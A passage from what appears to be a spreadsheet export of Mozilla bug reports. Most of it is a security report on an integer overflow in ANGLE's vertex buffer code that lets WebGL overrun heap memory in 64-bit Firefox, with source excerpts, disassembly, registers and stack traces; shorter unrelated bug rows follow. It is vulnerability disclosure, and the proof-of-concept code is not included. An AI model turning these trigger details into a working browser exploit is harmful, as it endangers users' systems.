This bug can be manifested under Win64 with D3D 11 (see attached proof-of-concept [0] and details below) and probably also under Linux x64. Someone with more knowledge of WebGL might also be able to manifest this bug under Win32 and other 32-bit platforms.
Details:
------------------------------------------------------------------------------------------------------
The bug is in VertexBufferInterface::reserveVertexSpace:
135: gl::Error VertexBufferInterface::reserveVertexSpace(const gl::VertexAttribute &amp;attrib, GLsizei count, GLsizei instances)
136: {
137:    gl::Error error(GL_NO_ERROR);
138:
139:    unsigned int requiredSpace;
140:    error = mVertexBuffer-&gt;getSpaceRequired(attrib, count, instances, &amp;requiredSpace);
141:    if (error.isError())
142:    {
143:        return error;
144:    }
145:
146:    // Protect against integer overflow
147:    if (mReservedSpace + requiredSpace &lt; mReservedSpace)
148:    {
149:        return gl::Error(GL_OUT_OF_MEMORY, "Unable to reserve %u extra bytes in internal vertex buffer, "
150:                         "it would result in an overflow.", requiredSpace);
151:    }
152:
153:    mReservedSpace += requiredSpace;
154:
155:    // Align to 16-byte boundary
156:    mReservedSpace = rx::roundUp (mReservedSpace, 16u);
157:
158:    return gl::Error(GL_NO_ERROR);
159: }
The checks on line 147-51 close the overflow window, but the round-up on line 156 reopens it just a crack. If 
the WebGL program  uses 8 attribute arrays of size 0x1FFFFFF8, mReservedSpace on line 156 rounds up each time
(from 0x1FFFFFF8 to 0x20000000 on the 1st array, 0x3ffffff8 to 0x40000000 on the 2nd) and finally overflows from 0xFFFFFFF8 to 0 on the last array.
Later, when VertexBufferInterface::storeVertexAttributes is called to save the attributes into the buffer, it calls StreamingVertexBufferInterface::reserveSpace  with that same buffer size (0). reserveSpace then leaves
the existing default buffer of length 0x100000 bytes [1] in place:
209: gl::Error StreamingVertexBufferInterface::reserveSpace(unsigned int size)
210: {
211:     unsigned int curBufferSize = getBufferSize();
212:     if (size &gt; curBufferSize)
213:     {
214:         gl::Error error = setBufferSize(std::max(size, 3 * curBufferSize / 2));
215:         if (error.isError())
216:         {
217:             return error;
218:         }
219:         setWritePosition(0);
220:     }
221:     else if (getWritePosition() + size &gt; curBufferSize)
222:     {
223:         gl::Error error = discard();
224:         if (error.isError())
225:         {
226:             return error;
227:         }
228:         setWritePosition(0);
229:     }
230: 
231:     return gl::Error(GL_NO_ERROR);
232: }
(size == 0, so control skips from line 212 to line 221, and thence to line 231).
Finally, VertexBufferInterface::storeVertexAttributes is called to copy an entire attribute array into the (0x100000-byte) buffer:
116:    error = mVertexBuffer-&gt;storeVertexAttributes(attrib, currentValue, start, count, instances, mWritePosition);
Since all of the proof-of-concept attribute arrays are 0x1FFFFFF8 bytes, this causes a potentially huge overrun. In testing the POC several times, this has had various effects:
1. Writing into a structure from which the video driver extracts a pointer, resulting in an attempt to read an invalid address (and probably other undetected corruption before the exception). This example is included, below. I saw this problem twice in different guises.
2. Writing into a function pointer, causing the video driver to attempt to call a function at an invalid address.
3. Writing into a function pointer, causing nss3.dll!PR_GetEnv to attempt to call a function at an invalid address.
4. A stack overflow with unknown corruption beforehand.
5. The display going blank, then partially repainting, with the message "Display driver nvlddmkm stopped responding and has successfully recovered" popping up, followed by an exception hitting an inaccessible page.
6. Hitting an inaccessible page, causing an exception, after overwriting varied amounts of unowned memory with no visible effects.
------------------------------------------------------------------------------------------------------
Manifesting the bug 
The following crash occured while running the attached proof-of-concept program. The setup was to run FF 40b8 x64 on Win7 SP1 (I wasn't able to find 39.0 x64. Where is it distributed?). I attached the VS debugger to FF, then opened 4 windows and navigated to the following sites in 3 of them:
   Dynamic procedural terrain (http://alteredqualia.com/three/examples/webgl_terrain_dynamic.html )
   Bill Nye Reading Mean Tweets (https://www.youtube.com/watch?v=mm4Rwyi-k08 )
   WebGL Aquarium (http://webglsamples.org/aquarium/aquarium.html )
[See note [2]]
I then ran the proof-of-concept program in the 4th window. At the "unresponsive script" alert box, I clicked "continue". A few seconds later the following crash appeared in VS:
Exception thrown at 0x000007FEEA9CE79A (nvwgf2umx.dll) in firefox.exe: 0xC0000005: Access violation reading location 0xFFFFFFFFFFFFFFFF.
Investigating, I found that the actual address that was read to cause the exception was different. Reading the code stream:
000007FEEA9CE760  mov         qword ptr [rsp+10h],rbx  
000007FEEA9CE765  push        rdi  
000007FEEA9CE766  mov         rcx,qword ptr [r9+20h]  
000007FEEA9CE76A  or          r11,0FFFFFFFFFFFFFFFFh  
000007FEEA9CE76E  xor         r10d,r10d  
000007FEEA9CE771  xor         ebx,ebx  
000007FEEA9CE773  mov         rdi,rdx  
000007FEEA9CE776  test        rcx,rcx  
000007FEEA9CE779  je          000007FEEA9CE806  
000007FEEA9CE77F  mov         rdx,qword ptr [rcx+40h]  
000007FEEA9CE783  mov         qword ptr [rsp+10h],rsi  
000007FEEA9CE788  mov         rax,qword ptr [rdx]  
000007FEEA9CE78B  test        rax,rax  
000007FEEA9CE78E  je          000007FEEA9CE7BD  
000007FEEA9CE790  mov         r10,qword ptr [rax+1E8h]  
000007FEEA9CE797  mov         rbx,rdx  
&gt; 000007FEEA9CE79A  mov         rax,qword ptr [r10+118h]  
000007FEEA9CE7A1  mov         r11,qword ptr [r10+110h]  
000007FEEA9CE7A8  cmp         r11,rax  
000007FEEA9CE7AB  cmovbe      r11,rax  
000007FEEA9CE7AF  mov         rax,qword ptr [r10+120h]  
000007FEEA9CE7B6  cmp         r11,rax  
We find that r10 at the crashing instruction is 0x433a0000433a0000, which is exactly the bad data that the POC writes [3]. r10 came from [rax+1E8h], which contained:
0x000000003D384F98  00 00 3a 43 00 00 3a 43 00 00 3a 43 00 00 3a 43  ..:C..:C..:C..:C
0x000000003D384FA8  00 00 3a 43 00 00 3a 43 00 00 3a 43 00 00 3a 43  ..:C..:C..:C..:C
0x000000003D384FB8  00 00 3a 43 00 00 3a 43 00 00 3a 43 00 00 3a 43  ..:C..:C..:C..:C
0x000000003D384FC8  00 00 3a 43 00 00 3a 43 00 00 3a 43 00 00 3a 43  ..:C..:C..:C..:C
0x000000003D384FD8  00 00 3a 43 00 00 3a 43 00 00 3a 43 00 00 3a 43  ..:C..:C..:C..:C
0x000000003D384FE8  00 00 3a 43 00 00 3a 43 00 00 3a 43 00 00 3a 43  ..:C..:C..:C..:C
The thread's registers were:
RAX = 000000003D384DB0 RBX = 000000000F36D540 RCX = 000000000F36B180 RDX = 000000000F36D540 
RSI = 0000000000000002 RDI = 000000000FBFE958 R8  = 000000000FBFE9A8 R9  = 000000000F36D770 
R10 = 433A0000433A0000 R11 = FFFFFFFFFFFFFFFF R12 = 0000000000000002 R13 = 0000000000000002 
R14 = 00000000542CA6A0 R15 = 000000000F36D770 RIP = 000007FEEA9CE79A RSP = 000000000FBFE910 
RBP = 00000000004C2DD0 EFL = 00010202 
And the thread's stack was:
&gt;	nvwgf2umx.dll!000007feea9ce79a()	Unknown
 	nvwgf2umx.dll!000007feea94b040()	Unknown
 	nvwgf2umx.dll!000007feea94ac14()	Unknown
 	nvwgf2umx.dll!000007feea3b944e()	Unknown
 	nvwgf2umx.dll!000007feea2c2df4()	Unknown
 	nvwgf2umx.dll!000007feea3ea279()	Unknown
 	d3d11.dll!CResource&lt;struct ID3D11Resource&gt;::Map&lt;0,5&gt;(class CContext *,class CResource&lt;struct 
ID3D11Resource&gt; *,unsigned int,enum D3D11_MAP,unsigned int,struct D3D11_MAPPED_SUBRESOURCE *)	Unknown
 	d3d11.dll!CContext::ID3D11DeviceContext1_Map_&lt;1&gt;(struct ID3D11DeviceContext1 *,struct ID3D11Resource 
*,unsigned int,enum D3D11_MAP,unsigned int,struct D3D11_MAPPED_SUBRESOURCE *)	Unknown
 	xul.dll!mozilla::layers::CompositorD3D11::UpdateConstantBuffers() Line 1347	C++
 	xul.dll!mozilla::layers::CompositorD3D11::ClearRect(const 
mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; &amp; aRect) Line 600	C++
 	xul.dll!mozilla::layers::CompositorD3D11::BeginFrame(const nsIntRegion &amp; aInvalidRegion, const 
mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; * aClipRectIn, const 
mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; &amp; aRenderBounds, 
mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; * aClipRectOut, 
mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; * aRenderBoundsOut) Line 1076	C++
 	xul.dll!mozilla::layers::LayerManagerComposite::Render() Line 718	C++
 	xul.dll!mozilla::layers::LayerManagerComposite::EndTransaction(void (mozilla::layers::PaintedLayer *, 
gfxContext *, const nsIntRegion &amp;, mozilla::layers::DrawRegionClip, const nsIntRegion &amp;, void *) * aCallback, 
void * aCallbackData, mozilla::layers::LayerManager::EndTransactionFlags aFlags) Line 319	C++
 	xul.dll!mozilla::layers::LayerManagerComposite::EndEmptyTransaction
(mozilla::layers::LayerManager::EndTransactionFlags aFlags) Line 262	C++
 	xul.dll!mozilla::layers::CompositorParent::CompositeToTarget(mozilla::gfx::DrawTarget * aTarget, const 
mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; * aRect) Line 1143	C++
 	xul.dll!mozilla::layers::CompositorVsyncScheduler::Composite(mozilla::TimeStamp aVsyncTimestamp) Line 
519	C++
 	xul.dll!RunnableMethod&lt;SoftwareDisplay,void (__cdecl SoftwareDisplay::*)(mozilla::TimeStamp) 
__ptr64,Tuple1&lt;mozilla::TimeStamp&gt; &gt;::Run() Line 311	C++
 	xul.dll!MessageLoop::DoWork() Line 456	C++
 	xul.dll!base::MessagePumpForUI::DoRunLoop() Line 217	C++
 	xul.dll!base::MessagePumpWin::Run(base::MessagePump::Delegate * delegate) Line 78	C++
 	xul.dll!MessageLoop::RunHandler() Line 227	C++
 	xul.dll!MessageLoop::Run() Line 201	C++
 	xul.dll!base::Thread::ThreadMain() Line 173	C++
 	xul.dll!`anonymous namespace'::ThreadFunc(void * closure) Line 27	C++
 	kernel32.dll!BaseThreadInitThunk()	Unknown
 	ntdll.dll!RtlUserThreadStart()	Unknown
and the thread's description was:
Not Flagged	&gt;	0x00000CF4	0x00	Worker Thread	xul.dll!`anonymous namespace'::ThreadFunc	
nvwgf2umx.dll!000007feea9ce79a	Normal
BUT the main thread was still in memcpy, still overwriting memory that it didn't own:
Not Flagged		0x000012B0	0x00	Main Thread	Main Thread	msvcr120.dll!memcpy	Normal
and its stack was:
 	msvcr120.dll!memcpy() Line 357	Unknown
&gt;	libGLESv2.dll!rx::VertexBuffer11::storeVertexAttributes(const gl::VertexAttribute &amp; attrib, const 
gl::VertexAttribCurrentValueData &amp; currentValue, int start, int count, int instances, unsigned int offset) Line 
122	C++
 	libGLESv2.dll!rx::VertexBufferInterface::storeVertexAttributes(const gl::VertexAttribute &amp; attrib, 
const gl::VertexAttribCurrentValueData &amp; currentValue, int start, int count, int instances, unsigned int * 
outStreamOffset) Line 116	C++
 	libGLESv2.dll!rx::VertexDataManager::storeAttribute(const gl::VertexAttribute &amp; attrib, const 
gl::VertexAttribCurrentValueData &amp; currentValue, rx::TranslatedAttribute * translated, int start, int count, 
int instances) Line 295	C++
 	libGLESv2.dll!rx::VertexDataManager::prepareVertexData(const gl::State &amp; state, int start, int count, 
rx::TranslatedAttribute * translated, int instances) Line 131	C++
 	libGLESv2.dll!rx::Renderer11::applyVertexBuffer(const gl::State &amp; state, int first, int count, int 
instances) Line 994	C++
 	libGLESv2.dll!gl::Context::drawArrays(unsigned int mode, int first, int count, int instances) Line 1786	
C++
 	libGLESv2.dll!glDrawArrays(unsigned int mode, int first, int count) Line 1387	C++
 	xul.dll!mozilla::gl::GLContext::fDrawArrays(unsigned int mode, int first, int count) Line 1144	C++
 	xul.dll!mozilla::WebGLContext::DrawArrays(unsigned int mode, int first, int count) Line 142	C++
 	xul.dll!mozilla::dom::WebGLRenderingContextBinding::drawArrays(JSContext * cx, JS::Handle&lt;JSObject *&gt; 
obj, mozilla::WebGLContext * self, const JSJitMethodCallArgs &amp; args) Line 10758	C++
 	xul.dll!mozilla::dom::GenericBindingMethod(JSContext * cx, unsigned int argc, JS::Value * vp) Line 2615	
C++
 	xul.dll!js::Invoke(JSContext * cx, JS::CallArgs args, js::MaybeConstruct construct) Line 753	C++
 	xul.dll!Interpret(JSContext * cx, js::RunState &amp; state) Line 2962	C++
 	xul.dll!js::RunScript(JSContext * cx, js::RunState &amp; state) Line 683	C++
 	xul.dll!js::Invoke(JSContext * cx, JS::CallArgs args, js::MaybeConstruct construct) Line 756	C++
 	xul.dll!js::Invoke(JSContext * cx, const JS::Value &amp; thisv, const JS::Value &amp; fval, unsigned int argc, 
const JS::Value * argv, JS::MutableHandle&lt;JS::Value&gt; rval) Line 790	C++
 	xul.dll!mozilla::dom::EventHandlerNonNull::Call(JSContext * cx, JS::Handle&lt;JS::Value&gt; aThisVal, 
mozilla::dom::Event &amp; event, JS::MutableHandle&lt;JS::Value&gt; aRetVal, mozilla::ErrorResult &amp; aRv) Line 260	C++
 	xul.dll!mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports * __ptr64&gt;(nsISupports * const &amp; thisVal, 
mozilla::dom::Event &amp; event, JS::MutableHandle&lt;JS::Value&gt; aRetVal, mozilla::ErrorResult &amp; aRv, const char * 
aExecutionReason, mozilla::dom::CallbackObject::ExceptionHandling aExceptionHandling, JSCompartment * 
aCompartment) Line 351	C++
 	xul.dll!mozilla::JSEventHandler::HandleEvent(nsIDOMEvent * aEvent) Line 216	C++
 	xul.dll!mozilla::EventListenerManager::HandleEventInternal(nsPresContext * aPresContext, 
mozilla::WidgetEvent * aEvent, nsIDOMEvent * * aDOMEvent, mozilla::dom::EventTarget * aCurrentTarget, 
nsEventStatus * aEventStatus) Line 1129	C++
 	xul.dll!mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt; &amp; 
aChain, mozilla::EventChainPostVisitor &amp; aVisitor, mozilla::EventDispatchingCallback * aCallback, 
mozilla::ELMCreationDetector &amp; aCd) Line 301	C++
 	xul.dll!mozilla::EventDispatcher::Dispatch(nsISupports * aTarget, nsPresContext * aPresContext, 
mozilla::WidgetEvent * aEvent, nsIDOMEvent * aDOMEvent, nsEventStatus * aEventStatus, 
mozilla::EventDispatchingCallback * aCallback, nsTArray&lt;mozilla::dom::EventTarget *&gt; * aTargets) Line 638	
C++
 	xul.dll!nsDocumentViewer::LoadComplete(nsresult aStatus) Line 1000	C++
 	xul.dll!nsDocShell::EndPageLoad(nsIWebProgress * aProgress, nsIChannel * aChannel, nsresult aStatus) 
Line 7562	C++
 	xul.dll!nsDocShell::OnStateChange(nsIWebProgress * aProgress, nsIRequest * aRequest, unsigned int 
aStateFlags, nsresult aStatus) Line 7371	C++
 	xul.dll!nsDocLoader::DoFireOnStateChange(nsIWebProgress * const aProgress, nsIRequest * const aRequest, 
int &amp; aStateFlags, const nsresult aStatus) Line 1250	C++
 	xul.dll!nsDocLoader::doStopDocumentLoad(nsIRequest * request, nsresult aStatus) Line 829	C++
 	xul.dll!nsDocLoader::DocLoaderIsEmpty(bool aFlushLayout) Line 721	C++
 	xul.dll!nsDocLoader::OnStopRequest(nsIRequest * aRequest, nsISupports * aCtxt, nsresult aStatus) Line 
606	C++
 	xul.dll!nsLoadGroup::RemoveRequest(nsIRequest * request, nsISupports * ctxt, nsresult aStatus) Line 652	
C++
 	xul.dll!nsDocument::DoUnblockOnload() Line 9160	C++
 	xul.dll!nsDocument::UnblockOnload(bool aFireSync) Line 9089	C++
 	xul.dll!nsDocument::DispatchContentLoadedEvents() Line 5225	C++
 	xul.dll!nsRunnableMethodImpl&lt;void (__cdecl imgRequestProxy::*)(void) __ptr64,1&gt;::Run() Line 811	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 872	C++
 	xul.dll!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate * aDelegate) Line 95	C++
 	xul.dll!MessageLoop::RunHandler() Line 227	C++
 	xul.dll!MessageLoop::Run() Line 201	C++
 	xul.dll!nsBaseAppShell::Run() Line 167	C++
 	xul.dll!nsAppShell::Run() Line 180	C++
 	xul.dll!nsAppStartup::Run() Line 281	C++
 	xul.dll!XREMain::XRE_mainRun() Line 4079	C++
 	xul.dll!XREMain::XRE_main(int argc, char * * argv, const nsXREAppData * aAppData) Line 4170	C++
 	xul.dll!XRE_main(int argc, char * * argv, const nsXREAppData * aAppData, unsigned int aFlags) Line 4260	
C++
 	firefox.exe!do_main(int argc, char * * argv, nsIFile * xreDirectory) Line 214	C++
 	firefox.exe!NS_internal_main(int argc, char * * argv) Line 480	C++
 	firefox.exe!wmain(int argc, wchar_t * * argv) Line 138	C++
 	firefox.exe!__tmainCRTStartup() Line 255	C
 	kernel32.dll!BaseThreadInitThunk()	Unknown
 	ntdll.dll!RtlUserThreadStart()	Unknown
Examining the libGLESv2.dll!rx::VertexBuffer11::storeVertexAttributes frame, we find that the code used the following parameters:
  0x000000003bed0000 pData
+ 0x00000000000e0a20 offset
= 0x000000003BFB0A20 attribute buffer base
  0x000000003C0B0A1F attribute buffer end
  0x000000003D384F98 is the address from which the video driver read its pointer
Examining the main thread code memcpy frame, we see that the thread stopped at:
000007FEF6BBC623  nop         word ptr [rax+rax]  
000007FEF6BBC630  mov         rax,qword ptr [rdx+rcx]  
--- No source file -------------------------------------------------------------
&gt; 000007FEF6BBC634  mov         r10,qword ptr [rdx+rcx+8]  
000007FEF6BBC639  add         rcx,20h  
000007FEF6BBC63D  mov         qword ptr [rcx-20h],rax  
000007FEF6BBC641  mov         qword ptr [rcx-18h],r10  
000007FEF6BBC645  mov         rax,qword ptr [rdx+rcx-10h]  
000007FEF6BBC64A  mov         r10,qword ptr [rdx+rcx-8]  
000007FEF6BBC64F  dec         r9  
000007FEF6BBC652  mov         qword ptr [rcx-10h],rax  
000007FEF6BBC656  mov         qword ptr [rcx-8],r10  
000007FEF6BBC65A  jne         MoveSmall+190h (07FEF6BBC630h)  
000007FEF6BBC65C  and         r8,1Fh  
000007FEF6BBC660  jmp         mcpy00aa+73h (07FEF6BBC457h)  
with registers:
RAX = 433A0000433A0000 RBX = 000000000023B230 RCX = 000000003D48F820 RDX = 000000006404F5E0 
RSI = 0000000000000000 RDI = 00000000494C1800 R8  = 000000001FFFFFF8 R9  = 0000000000F5908F 
R10 = 433A0000433A0000 R11 = 000000003BFB0A20 R12 = 00000000111BEDC0 R13 = 000000002AFBB400 
R14 = 000000003BFB0A20 R15 = 0000000000000004 RIP = 000007FEF6BBC634 RSP = 000000000023B0D8 
RBP = 000000000023B171 EFL = 00000212 
So the last data it wrote was at
0x000000003D48F820 - 8 == 0x000000003D48F818
This means that memcpy wrote
  0x000000003D48F818 - 0x000000003BFB0A20 == 0x00000000014DEDF8
bytes, beginning at the buffer's base, extending far beyond its end, including the memory from which the video driver read its pointer, and terminating only when the OS suspended the process's threads due to the exception in the video driver thread.
------------------------------------------------------------------------------------------------------
[0] Extract poc.js, poc.htm, and glMatrix-0.9.5.min.js from the attachment. Save them all in the same folder and load poc.htm from that folder.
[1] This is set by VertexDataManager::VertexDataManager using the constant INITIAL_STREAM_BUFFER_SIZE.
[2] It's probably easiest to reproduce obviously adverse effects from this bug by running 2 windows of "Dynamic Procedural Terrain" and one of "Bill Nye Reading Mean Tweets". You might need to try it several times. You can witness the overwriting directly by putting a breakpoint on VertexBuffer11::storeVertexAttributes and stepping into its call to vertexFormatInfo.copyFunction.
[3] See poc.js line 149, which assigns the (float) attribute array elements the value 0xba. This is represented as 0x433a0000.</t>
        </is>
      </c>
      <c r="X6049" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6050">
      <c r="A6050" t="n">
        <v>53595</v>
      </c>
      <c r="B6050" t="inlineStr">
        <is>
          <t>2000-09-21 12:04:18 -0700</t>
        </is>
      </c>
      <c r="C6050" t="inlineStr">
        <is>
          <t>Bugzilla helper has no Component choice</t>
        </is>
      </c>
      <c r="D6050" t="inlineStr">
        <is>
          <t>2011-08-05 21:17:47 -0700</t>
        </is>
      </c>
      <c r="E6050" t="n">
        <v>1</v>
      </c>
      <c r="F6050" t="n">
        <v>1</v>
      </c>
      <c r="G6050" t="n">
        <v>5</v>
      </c>
      <c r="H6050" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6050" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J6050" t="inlineStr">
        <is>
          <t>Miscellaneous</t>
        </is>
      </c>
      <c r="K6050" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6050" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6050" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6050" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6050" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6050" t="inlineStr"/>
      <c r="Q6050" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6050" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6050" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6050" t="n">
        <v>1</v>
      </c>
      <c r="U6050" t="n">
        <v>0</v>
      </c>
      <c r="V6050" t="n">
        <v>8</v>
      </c>
      <c r="W6050" t="inlineStr">
        <is>
          <t>This seems to be a platform independent bug, cause server side.
Load the page specified in URL and go down to step 3. Next to "Component", you
see the drop down list with the highlighted menu: "Choose one..." If you want to
choose one, you see only one item and a long list of empty elements. The only
element that reads anything says: "A Wide one to widen the widget"
I think this is a major bug because this prevents people from using the helper
at all.</t>
        </is>
      </c>
      <c r="X6050" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6051">
      <c r="A6051" t="n">
        <v>858060</v>
      </c>
      <c r="B6051" t="inlineStr">
        <is>
          <t>2013-04-04 07:27:00 -0700</t>
        </is>
      </c>
      <c r="C6051" t="inlineStr">
        <is>
          <t>Assertion failure: cur-&gt;isKind(PNK_FUNCTION), at frontend/NameFunctions.cpp:318</t>
        </is>
      </c>
      <c r="D6051" t="inlineStr">
        <is>
          <t>2014-05-05 18:12:19 -0700</t>
        </is>
      </c>
      <c r="E6051" t="n">
        <v>1</v>
      </c>
      <c r="F6051" t="n">
        <v>1</v>
      </c>
      <c r="G6051" t="n">
        <v>3</v>
      </c>
      <c r="H6051" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6051" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6051" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6051" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6051" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6051" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6051" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6051" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6051" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main23+]</t>
        </is>
      </c>
      <c r="Q6051" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6051" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6051" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T6051" t="n">
        <v>1</v>
      </c>
      <c r="U6051" t="n">
        <v>0</v>
      </c>
      <c r="V6051" t="n">
        <v>28</v>
      </c>
      <c r="W6051" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision c232bec6974d (no options required):
g("module 'foo' {}");
function g(x) {
  eval(x, g.escaped);
}</t>
        </is>
      </c>
      <c r="X6051" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6052">
      <c r="A6052" t="n">
        <v>1024692</v>
      </c>
      <c r="B6052" t="inlineStr">
        <is>
          <t>2014-06-12 12:54:32 -0700</t>
        </is>
      </c>
      <c r="C6052" t="inlineStr">
        <is>
          <t>camera app is killed during zoom in/zoom out (out of memory) on 256 MB target</t>
        </is>
      </c>
      <c r="D6052" t="inlineStr">
        <is>
          <t>2015-04-03 12:36:51 -0700</t>
        </is>
      </c>
      <c r="E6052" t="n">
        <v>1</v>
      </c>
      <c r="F6052" t="n">
        <v>1</v>
      </c>
      <c r="G6052" t="n">
        <v>6</v>
      </c>
      <c r="H6052" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6052" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6052" t="inlineStr">
        <is>
          <t>Gaia::Camera</t>
        </is>
      </c>
      <c r="K6052" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6052" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6052" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6052" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6052" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6052" t="inlineStr">
        <is>
          <t>[c=memory p= s= u=1.4] [caf priority: p1][CR 673864][MemShrink:P2]</t>
        </is>
      </c>
      <c r="Q6052" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6052" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6052" t="inlineStr">
        <is>
          <t>2.0 S6 (18july)</t>
        </is>
      </c>
      <c r="T6052" t="n">
        <v>1</v>
      </c>
      <c r="U6052" t="n">
        <v>0</v>
      </c>
      <c r="V6052" t="n">
        <v>82</v>
      </c>
      <c r="W6052" t="inlineStr">
        <is>
          <t>STR:
Go to Camera-&gt;take a photo-&gt; tap on shortcut to open the photo
try Zoom out/Zoom in and observe
Expected result:
device should be Zoom in and Zoom out
Actual result:
camera app is killed
we are seeing following thing in dmesg:
&lt;6&gt;[  151.338733] send sigkill to 1847 ((Preallocated a), adj 667, size 1215
&lt;6&gt;[  151.636678] send sigkill to 1615 (Homescreen), adj 534, size 1090
&lt;6&gt;[  151.782002] send sigkill to 1697 (Camera), adj 134, size 1445
&lt;4&gt;[  151.782204] Camera used greatest stack depth: 4444 bytes left
This indicated that we are running out of memory and LMK is killing apps in proper order as expected .
Device used : MSM8610 256MB.
Issue is present in both FFOS v1.3 and FFOS v1.4 running on same 256MB target. If we increase memory to 512MB then issue does not reproduce for same build.
This is observed with fix from 
[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1002593#c46
[2] https://bugzilla.mozilla.org/show_bug.cgi?id=1014955#c39
Please let me know if you want to see DMD report or not.</t>
        </is>
      </c>
      <c r="X6052" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6053">
      <c r="A6053" t="n">
        <v>870681</v>
      </c>
      <c r="B6053" t="inlineStr">
        <is>
          <t>2013-05-09 23:58:03 -0700</t>
        </is>
      </c>
      <c r="C6053" t="inlineStr">
        <is>
          <t>Urgent change needed in &lt;title&gt; generation</t>
        </is>
      </c>
      <c r="D6053" t="inlineStr">
        <is>
          <t>2020-05-15 11:43:12 -0700</t>
        </is>
      </c>
      <c r="E6053" t="n">
        <v>1</v>
      </c>
      <c r="F6053" t="n">
        <v>1</v>
      </c>
      <c r="G6053" t="n">
        <v>6</v>
      </c>
      <c r="H6053" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6053" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J6053" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6053" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6053" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6053" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N6053" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6053" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6053" t="inlineStr">
        <is>
          <t>[specification][type:bug]</t>
        </is>
      </c>
      <c r="Q6053" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6053" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6053" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6053" t="n">
        <v>1</v>
      </c>
      <c r="U6053" t="n">
        <v>0</v>
      </c>
      <c r="V6053" t="n">
        <v>2</v>
      </c>
      <c r="W6053" t="inlineStr">
        <is>
          <t>What did you do?
================
What happened?
==============
What should have happened?
==========================
Is there anything else we should know?
======================================
Our title are generated with the ending - &lt;first level title&gt; - MDN, like
- CSS - MDN
or 
- HTML - MDN
We are changing the hierarchy, for the May redesign, and now we have a Web/ page as the top of the hierarchy.
This broke the &lt;title&gt;, making them useless and destroying our SEO.
So we have to implement this stop-gap algorithm.
If there is a non-terminal second level which is not "Guide" Take the _second_ level as title ending (with - MDN appended of course).
If there is a non-terminal second level which is 'Guide', and a the non-terminal third level take the _third_level as title ending ( with -MDN appended).
If there is a non-terminal second level which is 'Guide' but a terminal third level, take the second level as title. (+ -MDN)
If there is a terminal second level, take the first level (+ -MDN)
If there is a terminal first level (that is Web/ mainly), just put -MDN.
This will probably be tweaked in the future, but we need this in production before to be able to continue to work on the May redesign.</t>
        </is>
      </c>
      <c r="X6053" t="n">
